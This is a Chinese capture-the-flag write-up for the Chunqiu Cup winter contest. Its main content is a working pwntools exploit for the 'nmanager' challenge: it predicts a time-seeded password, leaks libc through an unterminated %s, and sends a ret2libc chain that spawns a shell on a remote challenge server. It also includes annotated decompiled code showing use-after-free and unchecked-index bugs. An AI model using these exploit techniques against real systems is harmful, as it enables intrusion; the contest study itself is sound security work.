春秋杯冬季赛wp
pwn
好菜,pwn就出了一个题,堆题做不出
nmanager
可以用 printf 的 %s 泄露 libc 地址，然后打 ret2libc；n 为 8 时刚好落到 rbp 那里
// Decompiled (IDA) edit loop over the record array at a1. Each record is 120
// bytes: gender at +0 (0x20 bytes), age at +32 (8 bytes), name at +40 (0x40
// bytes). The return value is the decompiler's rendering of the
// stack-protector check (0 when the canary is intact).
unsigned __int64 __fastcall modify(__int64 a1)
{
    char buf[24]; // [rsp+10h] [rbp-20h] BYREF
    unsigned __int64 v3; // [rsp+28h] [rbp-8h]
    v3 = __readfsqword(0x28u);
    do
    {
        puts("## select the idx you want modify ##");
        // n is a global (not declared in this function) and is never
        // range-checked: any int the user supplies selects the record, so
        // every access below can land outside the array. The missing bounds
        // check on n is the root defect here.
        __isoc99_scanf("%d", &n);
        printf("gender: ");
        // read() does not NUL-terminate; a full 0x20-byte gender leaves no
        // terminator before the age field.
        read(0, (void *)(120LL * n + a1), 0x20uLL);
        printf("age: ");
        __isoc99_scanf("%lld", 120LL * n + a1 + 32);
        printf("name: ");
        read(0, (void *)(120LL * n + a1 + 40), 0x40uLL);
        // %s prints until a NUL, so an unterminated gender/name field echoes
        // whatever follows it in memory (information disclosure). Mitigation:
        // validate n against the array length and bound the echo with
        // "%.32s" / "%.64s" (or explicitly terminate the fields).
        printf(
            "[idx%d]:\nname: %s\nage: %lld\ngender: %s\n",
            (unsigned int)n,
            (const char *)(120LL * n + a1 + 40),
            *(_QWORD *)(120LL * n + a1 + 32),
            (const char *)(120LL * n + a1));
        puts("quit now?(Y/y)");
        // buf is never initialised and read()'s result is not checked, so on
        // EOF buf[0] is indeterminate when the loop condition reads it.
        read(0, buf, 3uLL);
    }
    while ( buf[0] != 121 && buf[0] != 89 ); // loop until 'y' or 'Y'
    return v3 - __readfsqword(0x28u);
}
exp
from pwn import *
from LibcSearcher import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./nmanager')
libc = elf.libc
is_debug = 0
# Local process when debugging, otherwise the remote challenge instance.
if(is_debug):
    p = process()
else:
    ip = "8.147.131.194"
    port = 43635
    p = remote(ip,port)
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
ru(" ######################################################\n")
# The script assumes the target draws its password from rand() seeded with
# the current time and reproduces that with the host libc. A time-seeded
# PRNG is not a secret -- that is the first weakness relied on here.
# NOTE: `time` is not imported in this file; it is relied on via
# `from pwn import *`. `libc` is rebound to the ctypes handle here and
# restored to elf.libc further down.
libc = ctypes.CDLL(None)
libc.srand(int(time.time()))
rand_result = libc.rand()
characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
password = characters[rand_result % 62]
ru("input password: ")
sl(password)
# Addresses for the non-PIE binary. leave_ret, puts_got, puts_plt, check and
# printf are not used below (left over from the author's template).
bss = 0x404000
ret = 0x000000000040101a
leave_ret = 0x40157f
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
check = 0x401585
printf = 0x4014F3
# Leak: modify() never range-checks the index, and index 8 reaches the stack
# frame (see the writeup note above). The gender field is read without a
# terminator, so the "%s" echo prints the bytes that follow it.
sla("## select the idx you want modify ##\n","8")
sa("gender: ","AAAAAAAA")
sla("age: ","123")
sa("name: ","nyyyddddn")
ru("AAAAAAAA")
# 0x29d90: offset of the leaked value inside the target's libc
# (build-specific; confirm against the libc shipped with the challenge).
libc_base = u64(r(6).ljust(8,b'\x00')) - 0x29d90
success(f"{hex(libc_base)}")
libc = elf.libc
rdi = libc_base + 0x000000000002a3e5
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
sa("quit now?(Y/y)\n","n")
# Second pass through modify() with the same index: the ret2libc chain is
# written through the same unchecked-index bug. Bounds-checking the index in
# modify() would close both the leak and this write.
sla("## select the idx you want modify ##\n","8")
payload = flat([
    bss,ret,rdi,binsh
])
sa("gender: ",payload)
sla("age: ",str(system))
sa("name: ","nyyyddddn")
# g(p)
sa("quit now?(Y/y)\n","y")
p.interactive()
book[未解决]
delete存在一个uaf
// Decompiled: frees the heap slot chosen by the user. v0 is never
// range-checked against the heap[] array, and the slot is not cleared after
// free(), so the stale pointer remains reachable through show() (use-after-
// free) and a second delete() on the same index is a double free.
// Mitigation: bounds-check v0 and set heap[v0] = NULL after free().
void delete()
{
    unsigned int v0; // [rsp+4h] [rbp-Ch]
    printf("Index:");
    v0 = my_read();
    free(*((void **)&heap + v0));
}
如果没有 PIE 的话，可以用 size 写地址，用 show 去泄露，用 edit 实现任意地址写，写 GOT 或者 fini 去打 one_gadget；可是有 PIE，咱太菜了，还不会做堆题
// Decompiled: prints heap[v1] as a C string. v1 is a signed int taken from
// the user with no range check, so a negative or large index reads outside
// heap[]; a freed slot is printed as well, since delete() leaves the pointer
// in place. Mitigation: reject indices outside the array and NULL entries.
int show()
{
    int v1; // [rsp+4h] [rbp-Ch]
    printf("Index:");
    v1 = my_read();
    return puts((const char *)heap[v1]);
}
// Decompiled: allocates a chunk of user-chosen size into a user-chosen slot.
// Neither v2 (index) nor v3 (size) is validated: an out-of-range v2 writes
// chunk[] and heap[] out of bounds, and malloc()'s result is stored without a
// NULL check. Returns the heap array base (decompiler artefact of
// `result = heap`).
_QWORD *add()
{
    void *v0; // rcx
    _QWORD *result; // rax
    int v2; // [rsp+0h] [rbp-10h]
    int v3; // [rsp+4h] [rbp-Ch]
    printf("Index:");
    v2 = my_read();
    printf("what size :");
    v3 = my_read();
    chunk[v2] = v3; // size bookkeeping for the slot
    v0 = malloc(v3);
    result = heap;
    // Previous heap[v2] (if any) is overwritten without being freed.
    heap[v2] = v0;
    return result;
}
re
upx2023[未解决]
不太清楚是魔改了什么的 UPX，区段和 UPX 的大多数特征都是正常的？用 x64dbg 下内存断点找 OEP 脱壳，走到这附件就是 OEP 了，Scylla 也能搜到导入表
一个随机数异或的逻辑? ida下断点断不住,好奇怪,调了半天没搞清楚cmp的逻辑


可信计算
搜了一下发现是ciscn2022的原题,容器甚至一模一样,flag_server下的flag甚至可以直接cat查看
在/root/cube-shell/instance/flag_server 下有个flag list,直接cat就能拿到题目1 和 2 的flag